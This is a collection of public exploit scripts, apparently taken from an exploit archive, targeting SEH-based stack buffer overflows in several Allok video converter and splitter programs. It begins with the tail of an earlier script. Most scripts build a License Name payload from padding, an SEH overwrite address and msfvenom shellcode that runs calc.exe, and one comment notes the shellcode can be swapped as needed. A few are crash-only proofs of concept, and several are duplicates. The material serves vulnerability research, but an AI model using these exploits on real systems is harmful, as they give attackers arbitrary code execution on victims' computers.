x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
outfile = file("poc.wav", 'wb')
outfile.write(data)
outfile.close()
print "Created Poc"
HireHackking 
# SWAMI KARUPASAMI THUNAI

###############################################################################
# Exploit Title:        Allok soft WMV to AVI MPEG DVD WMV Converter - Buffer Overflow Vulnerability (Windows XP SP3)
# Date:                 06-03-2018
# Exploit Author:       Mohan Ravichandran & Velayutham Selvaraj
# Organization :        TwinTech Solutions (Talented Pentesters Hut)
# Vulnerable Software:  Allok WMV to AVI MPEG DVD WMV Converter
# Vendor Homepage:      http://www.alloksoft.com
# Version:              4.6.1217
# Software Link:        http://www.alloksoft.com/wmv.htm
# Tested On:            Windows XP Service Pack 3 (Version 2002)
#
# Credit to Velayutham Selvaraj for discovering the Vulnerbility
# Vulnerability Disclosure Date : 2018-03-06
#
# Manual steps to reproduce the vulnerability ... 
#1.  Download and install the setup file
#2.  Run this exploit code via python 2.7
#3.  A file "exploit.txt" will be created
#4.  Copy the contents of the file and paste in the License Name field 
#    Name > exploit.txt
#5.  Type some random character in License Code
#6.  Click Register and voila !
#7.  Boom calculator opens
#
##############################################################################
import struct

file = open("exploit.txt","wb")
buflen = 4000
junk = "A" * 780
nseh = "\x90\x90\xeb\x10"
seh  = struct.pack("<L",0x10019A09)
nops = "\x90" * 20
# The below shellcode will open calculator, but can be modified by need.
shellcode = ""
shellcode +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
shellcode +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
shellcode +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
shellcode +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
shellcode +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
shellcode +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
shellcode +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
shellcode +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
shellcode +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
shellcode +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
shellcode +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
shellcode +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
shellcode +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
shellcode +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
shellcode +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
shellcode +="\xc4\xd9"
exploit = junk + nseh + seh + nops + shellcode
fillers = buflen - len(exploit)
buf = exploit + "D" * fillers
file.write(buf)
file.close()
HireHackking 
#######################################################
# Exploit Title: Buffer Overflow(SEH)  on Allok Video to DVD Burner2.6.1217
# Date: 23.04.2018
# Exploit Author:T3jv1l
# Vendor Homepage:http://www.alloksoft.com/
# Software: www.alloksoft.com/allok_dvdburner.exe
# Category:Local
# Contact:https://twitter.com/T3jv1l
# Version: Allok Video to DVD Burner 2.6.1217
# Tested on: Windows 7 SP1 x86
# Hello subinacls !
# Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
#############################################################

print"""
#1.  Download and install the setup file
#2.  Run this exploit code via python 2.7
#3.  A file "Evil.txt" will be created
#4.  Copy the contents of the file (Evil.txt)and paste in the License Name field 
#5.  Click Register and BOMM !!!! """

import struct

file = open("Evil.txt","wb")
buffer = 4000
junk = "A" * 780
nseh = "\x90\x90\xeb\x10"
seh  = struct.pack("<L",0x10019A09)
nop = "\x90" * 20

# Shellcode Calc.exe

buf = ""
buf +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
buf +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
buf +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
buf +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
buf +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
buf +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
buf +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
buf +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
buf +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
buf +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
buf +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
buf +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
buf +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
buf +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
buf +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
buf +="\xc4\xd9"
exploit = junk + nseh + seh + nop + buf
fillers = buffer - len(exploit)
crush = exploit + "T" * fillers
print "[+] Crush Me"
file.write(crush)
file.close()
HireHackking 
###########################################################################################
# Exploit Title: Allok Video Splitter 3.1.1217
# Date: 2018-05-09
# Exploit Author: Achilles
# Vendor Homepage: http://www.alloksoft.com/
# Vulnerable Software: http://www.alloksoft.com/allok_vsplitter.exe
# Tested on OS: Windows 7 64-bit DE
# Steps to reproduce: Copy the contents of the file (Evil.txt)
# and paste in the License Name field click Register and BOOM
###########################################################################################

#!/usr/bin/python
  
buffer = "A" * 780
  
try:
    f=open("Evil.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
HireHackking 
# SWAMI KARUPASAMI THUNAI

###############################################################################
# Exploit Title:        Alloksoft Video joiner (4.6.1217) - Buffer Overflow Vulnerability (Windows XP SP3)
# Date:                 06-03-2018
# Exploit Author:       Mohan Ravichandran & Velayutham Selvaraj
# Organization :        TwinTech Solutions
# Vulnerable Software:  Allok Video joiner
# Vendor Homepage:      http://www.alloksoft.com
# Version:              4.6.1217
# Software Link:        http://www.alloksoft.com/joiner.htm
# Tested On:            Windows XP Service Pack 3 (Version 2002)
#
# Credit to Velayutham Selvaraj for discovering the Vulnerbility
# Vulnerability Disclosure Date : 2018-03-06
#
# Manual steps to reproduce the vulnerability ... 
#1.  Download and install the setup file
#2.  Run this exploit code via python 2.7
#3.  A file "exploit.txt" will be created
#4.  Copy the contents of the file and paste in the License Name field 
#    Name > exploit.txt
#5.  Type some random character in License Code
#6.  Click Register and voila !
#7.  Boom calculator opens
#
##############################################################################
import struct

file = open("exploit.txt","wb")
buflen = 4000
junk = "A" * 780
nseh = "\x90\x90\xeb\x10"
seh  = struct.pack("<L",0x10019A09)
nops = "\x90" * 20
# The below shellcode will open calculator, but can be modified by need.
shellcode = ""
shellcode +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
shellcode +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
shellcode +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
shellcode +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
shellcode +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
shellcode +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
shellcode +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
shellcode +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
shellcode +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
shellcode +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
shellcode +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
shellcode +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
shellcode +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
shellcode +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
shellcode +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
shellcode +="\xc4\xd9"
exploit = junk + nseh + seh + nops + shellcode
fillers = buflen - len(exploit)
buf = exploit + "D" * fillers
file.write(buf)
file.close()
HireHackking 
# Exploit Title: Allok Video Converter 4.6.1217 - Stack Overflow (SEH)
# Date: 2020-01-12
# Exploit Author: Antonio de la Piedra
# Vendor Homepage: https://www.alloksoft.com
# Software Link: https://www.alloksoft.com/allok_vconverter.exe
# Version: 4.6.1217
# Tested on: Windows 7 SP1 32-bit

# Copy paste the contents of poc.txt into the License Name input field
# of Allok Video Converter 4.6.1217 to execute calc.exe.

nseh_offset = 780
total = 1000

# msfvenom -p windows/exec -b '\x00\x0a\x0d' -f python --var-name shellcode=
_calc CMD=calc.exe EXITFUNC=thread
shellcode_calc =  b""
shellcode_calc += b"\xdd\xc0\xbe\x48\x33\xfd\x23\xd9\x74\x24"
shellcode_calc += b"\xf4\x5f\x33\xc9\xb1\x31\x83\xef\xfc\x31"
shellcode_calc += b"\x77\x14\x03\x77\x5c\xd1\x08\xdf\xb4\x97"
shellcode_calc += b"\xf3\x20\x44\xf8\x7a\xc5\x75\x38\x18\x8d"
shellcode_calc += b"\x25\x88\x6a\xc3\xc9\x63\x3e\xf0\x5a\x01"
shellcode_calc += b"\x97\xf7\xeb\xac\xc1\x36\xec\x9d\x32\x58"
shellcode_calc += b"\x6e\xdc\x66\xba\x4f\x2f\x7b\xbb\x88\x52"
shellcode_calc += b"\x76\xe9\x41\x18\x25\x1e\xe6\x54\xf6\x95"
shellcode_calc += b"\xb4\x79\x7e\x49\x0c\x7b\xaf\xdc\x07\x22"
shellcode_calc += b"\x6f\xde\xc4\x5e\x26\xf8\x09\x5a\xf0\x73"
shellcode_calc += b"\xf9\x10\x03\x52\x30\xd8\xa8\x9b\xfd\x2b"
shellcode_calc += b"\xb0\xdc\x39\xd4\xc7\x14\x3a\x69\xd0\xe2"
shellcode_calc += b"\x41\xb5\x55\xf1\xe1\x3e\xcd\xdd\x10\x92"
shellcode_calc += b"\x88\x96\x1e\x5f\xde\xf1\x02\x5e\x33\x8a"
shellcode_calc += b"\x3e\xeb\xb2\x5d\xb7\xaf\x90\x79\x9c\x74"
shellcode_calc += b"\xb8\xd8\x78\xda\xc5\x3b\x23\x83\x63\x37"
shellcode_calc += b"\xc9\xd0\x19\x1a\x87\x27\xaf\x20\xe5\x28"
shellcode_calc += b"\xaf\x2a\x59\x41\x9e\xa1\x36\x16\x1f\x60"
shellcode_calc += b"\x73\xf8\xfd\xa1\x89\x91\x5b\x20\x30\xfc"
shellcode_calc += b"\x5b\x9e\x76\xf9\xdf\x2b\x06\xfe\xc0\x59"
shellcode_calc += b"\x03\xba\x46\xb1\x79\xd3\x22\xb5\x2e\xd4"
shellcode_calc += b"\x66\xd6\xb1\x46\xea\x37\x54\xef\x89\x47"

poc = ""
poc += "A"*nseh_offset
poc += "\xEB\x0b\x90\x90"   # jmp forward (nseh)
poc +=  "\x59\x78\x03\x10"  # pop pop ret (seh)
poc += "\x90"*20
poc += shellcode_calc
poc += "D"*(total - len(poc))

file = open("poc_seh.txt","w")
file.write(poc)
file.close()
HireHackking 
# Exploit Title: Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH)
# Date: 2020-01-12
# Exploit Author: Antonio de la Piedra
# Vendor Homepage: https://www.alloksoft.com
# Software Link: https://www.alloksoft.com/allok_rmconverter.exe
# Version: 3.6.1217
# Tested on: Windows 7 SP1 32-bit

# Copy paste the contents of poc_seh.txt into the License Name input field
# of  Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 to execute calc.exe.

#!/usr/bin/python

nseh_offset = 780
total = 1000

#  msfvenom -p windows/exec -b '\x00\x0a\x0d' -f python --var-name shellcode_calc CMD=calc.exe EXITFUNC=thread
shellcode_calc =  b""
shellcode_calc += b"\xdd\xc0\xbe\x48\x33\xfd\x23\xd9\x74\x24"
shellcode_calc += b"\xf4\x5f\x33\xc9\xb1\x31\x83\xef\xfc\x31"
shellcode_calc += b"\x77\x14\x03\x77\x5c\xd1\x08\xdf\xb4\x97"
shellcode_calc += b"\xf3\x20\x44\xf8\x7a\xc5\x75\x38\x18\x8d"
shellcode_calc += b"\x25\x88\x6a\xc3\xc9\x63\x3e\xf0\x5a\x01"
shellcode_calc += b"\x97\xf7\xeb\xac\xc1\x36\xec\x9d\x32\x58"
shellcode_calc += b"\x6e\xdc\x66\xba\x4f\x2f\x7b\xbb\x88\x52"
shellcode_calc += b"\x76\xe9\x41\x18\x25\x1e\xe6\x54\xf6\x95"
shellcode_calc += b"\xb4\x79\x7e\x49\x0c\x7b\xaf\xdc\x07\x22"
shellcode_calc += b"\x6f\xde\xc4\x5e\x26\xf8\x09\x5a\xf0\x73"
shellcode_calc += b"\xf9\x10\x03\x52\x30\xd8\xa8\x9b\xfd\x2b"
shellcode_calc += b"\xb0\xdc\x39\xd4\xc7\x14\x3a\x69\xd0\xe2"
shellcode_calc += b"\x41\xb5\x55\xf1\xe1\x3e\xcd\xdd\x10\x92"
shellcode_calc += b"\x88\x96\x1e\x5f\xde\xf1\x02\x5e\x33\x8a"
shellcode_calc += b"\x3e\xeb\xb2\x5d\xb7\xaf\x90\x79\x9c\x74"
shellcode_calc += b"\xb8\xd8\x78\xda\xc5\x3b\x23\x83\x63\x37"
shellcode_calc += b"\xc9\xd0\x19\x1a\x87\x27\xaf\x20\xe5\x28"
shellcode_calc += b"\xaf\x2a\x59\x41\x9e\xa1\x36\x16\x1f\x60"
shellcode_calc += b"\x73\xf8\xfd\xa1\x89\x91\x5b\x20\x30\xfc"
shellcode_calc += b"\x5b\x9e\x76\xf9\xdf\x2b\x06\xfe\xc0\x59"
shellcode_calc += b"\x03\xba\x46\xb1\x79\xd3\x22\xb5\x2e\xd4"
shellcode_calc += b"\x66\xd6\xb1\x46\xea\x37\x54\xef\x89\x47"

poc = ""
poc += "A"*nseh_offset
poc += "\xEB\x0b\x90\x90"   # jmp forward (nseh)
poc +=  "\x11\x7b\x03\x10"  # pop pop ret (seh)
poc += "\x90"*20
poc += shellcode_calc
poc += "D"*(total - len(poc))

file = open("poc_seh.txt","w")
file.write(poc)
file.close()
HireHackking 
# SWAMI KARUPASAMI THUNAI

###############################################################################
# Exploit Title:        Allok Video Converter - Buffer Overflow Vulnerability (Windows XP SP3)
# Date:                 06-03-2018
# Exploit Author:       Mohan Ravichandran & Velayutham Selvaraj
# Organization :        TwinTech Solutions
# Vulnerable Software:  Allok Video Converter
# Vendor Homepage:      http://www.alloksoft.com
# Version:              4.6.1217
# Software Link:        http://www.alloksoft.com/allok_vconverter.exe
# Tested On:            Windows XP Service Pack 3 (Version 2002)
#
# Credit to Velayutham Selvaraj for discovering the Vulnerbility
# Vulnerability Disclosure Date : 2018-03-06
#
# Manual steps to reproduce the vulnerability ... 
#1.  Download and install the "setup(allok_vconverter.exe)" file
#2.  Run this exploit code via python 2.7
#3.  A file "exploit.txt" will be created
#4.  Copy the contents of the file and paste in the License Name field 
#    Name > exploit.txt
#5.  Type some random character in License Code
#6.  Click Register and voila !
#7.  Boom calculator opens
#
##############################################################################
import struct

file = open("exploit.txt","wb")
buflen = 4000
junk = "A" * 780
nseh = "\x90\x90\xeb\x10"
seh  = struct.pack("<L",0x10019A09)
nops = "\x90" * 20
# The below shellcode will open calculator, but can be modified by need.
shellcode = ""
shellcode +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
shellcode +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
shellcode +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
shellcode +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
shellcode +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
shellcode +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
shellcode +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
shellcode +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
shellcode +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
shellcode +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
shellcode +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
shellcode +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
shellcode +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
shellcode +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
shellcode +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
shellcode +="\xc4\xd9"
exploit = junk + nseh + seh + nops + shellcode
fillers = buflen - len(exploit)
buf = exploit + "D" * fillers
file.write(buf)
file.close()
HireHackking 
###############################################################################
# Exploit Title:        Allok Video Converter - Buffer Overflow Vulnerability (Windows XP SP3)
# Date:                 06-03-2018
# Exploit Author:       Mohan Ravichandran & Velayutham Selvaraj
# Organization :        TwinTech Solutions
# Vulnerable Software:  Allok Video Converter
# Vendor Homepage:      http://www.alloksoft.com
# Version:              4.6.1217
# Software Link:        http://www.alloksoft.com/allok_vconverter.exe
# Tested On:            Windows XP Service Pack 3 (Version 2002)
#
# Credit to Velayutham Selvaraj for discovering the Vulnerbility
# Vulnerability Disclosure Date : 2018-03-06
#
# Manual steps to reproduce the vulnerability ... 
#1.  Download and install the "setup(allok_vconverter.exe)" file
#2.  Run this exploit code via python 2.7
#3.  A file "exploit.txt" will be created
#4.  Copy the contents of the file and paste in the License Name field 
#    Name > exploit.txt
#5.  Type some random character in License Code
#6.  Click Register and voila !
#7.  Boom calculator opens
#
##############################################################################
import struct

file = open("exploit.txt","wb")
buflen = 4000
junk = "A" * 780
nseh = "\x90\x90\xeb\x10"
seh  = struct.pack("<L",0x10019A09)
nops = "\x90" * 20
# The below shellcode will open calculator, but can be modified by need.
shellcode = ""
shellcode +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
shellcode +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
shellcode +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
shellcode +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
shellcode +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
shellcode +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
shellcode +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
shellcode +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
shellcode +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
shellcode +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
shellcode +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
shellcode +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
shellcode +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
shellcode +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
shellcode +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
shellcode +="\xc4\xd9"
exploit = junk + nseh + seh + nops + shellcode
fillers = buflen - len(exploit)
buf = exploit + "D" * fillers
file.write(buf)
file.close()
HireHackking 
# Exploit Title: Allok MOV Converter 4.6.1217 - Buffer Overflow (SEH)
# Date: 2018-07-29
# Discovery by: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Software Link: http://www.alloksoft.com/allok_movconverter.exe
# Tested Version: 4.6.1217
# Tested on OS: Windows XP Service Pack 3 x86
# Greetz: @hexachordanu @FuzzySec @LiveOverflow

# Steps to Reproduce: Run the python exploit script, it will create a new 
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# Start the Allok MOV Converter 4.6.1217 program and in the Lisence name paste the content of "exploit.txt" and click on Register.
# You will see a sweet calculator poped up.

file = open("exploit.txt","wb")
junk = "\x41" * 780
nseh = "\xeb\x10\x90\x90" #Short Jump address
seh = "\x79\x25\x01\x76"  #0x76012579

nops = "\x90" * 16

#badchar \x00\x08\x09\x0a\x0b\x0c\x0d
#msfvenom -p windows/exec CMD=calc.exe -b '\x00\x08\x09\x0a\x0b\x0c\x0d' -f python
buf =  ""
buf += "\xba\xbb\xf0\xaa\x11\xdd\xc3\xd9\x74\x24\xf4\x5e\x31"
buf += "\xc9\xb1\x31\x83\xee\xfc\x31\x56\x0f\x03\x56\xb4\x12"
buf += "\x5f\xed\x22\x50\xa0\x0e\xb2\x35\x28\xeb\x83\x75\x4e"
buf += "\x7f\xb3\x45\x04\x2d\x3f\x2d\x48\xc6\xb4\x43\x45\xe9"
buf += "\x7d\xe9\xb3\xc4\x7e\x42\x87\x47\xfc\x99\xd4\xa7\x3d"
buf += "\x52\x29\xa9\x7a\x8f\xc0\xfb\xd3\xdb\x77\xec\x50\x91"
buf += "\x4b\x87\x2a\x37\xcc\x74\xfa\x36\xfd\x2a\x71\x61\xdd"
buf += "\xcd\x56\x19\x54\xd6\xbb\x24\x2e\x6d\x0f\xd2\xb1\xa7"
buf += "\x5e\x1b\x1d\x86\x6f\xee\x5f\xce\x57\x11\x2a\x26\xa4"
buf += "\xac\x2d\xfd\xd7\x6a\xbb\xe6\x7f\xf8\x1b\xc3\x7e\x2d"
buf += "\xfd\x80\x8c\x9a\x89\xcf\x90\x1d\x5d\x64\xac\x96\x60"
buf += "\xab\x25\xec\x46\x6f\x6e\xb6\xe7\x36\xca\x19\x17\x28"
buf += "\xb5\xc6\xbd\x22\x5b\x12\xcc\x68\x31\xe5\x42\x17\x77"
buf += "\xe5\x5c\x18\x27\x8e\x6d\x93\xa8\xc9\x71\x76\x8d\x26"
buf += "\x38\xdb\xa7\xae\xe5\x89\xfa\xb2\x15\x64\x38\xcb\x95"
buf += "\x8d\xc0\x28\x85\xe7\xc5\x75\x01\x1b\xb7\xe6\xe4\x1b"
buf += "\x64\x06\x2d\x78\xeb\x94\xad\x51\x8e\x1c\x57\xae"

more = "\x41" * 100
exploit = junk + nseh + seh + nops + buf + more

file.write(exploit)
file.close()
HireHackking 
# Exploit Title: Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite POC 
# Vulnerability Type: SEH Overwrite POC
# Discovery by: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Discovey Date: 2018-08-01
# Software Link: http://www.alloksoft.com/fast_splitter.htm 
# Tested Version: 1.2
# Tested on OS: Windows XP Service Pack 3 x86

# Steps to Reproduce: 
# Run the python exploit.py , Open "exploit.txt" and copy content.
# Open Fast AVI MPEG Splitter , A registration prompt will appear.
# In the License field paste the content of "exploit.txt".
# Press "OK" and B00m Crashed.

#!/usr/bin/env python

# SEH chain of main thread, item 0
# Address=00129B78
# SE handler=43434343
# SEH chain of main thread, item 1
# Address=42424242
# SE handler=*** CORRUPT ENTRY ***
 
buffer = "\x41" * 544
nseh = "\x42\x42\x42\x42"
seh= "\x43\x43\x43\x43" 

exploit = buffer + nseh + seh 
f = open ("exploit.txt", "w")
f.write(exploit)
f.close()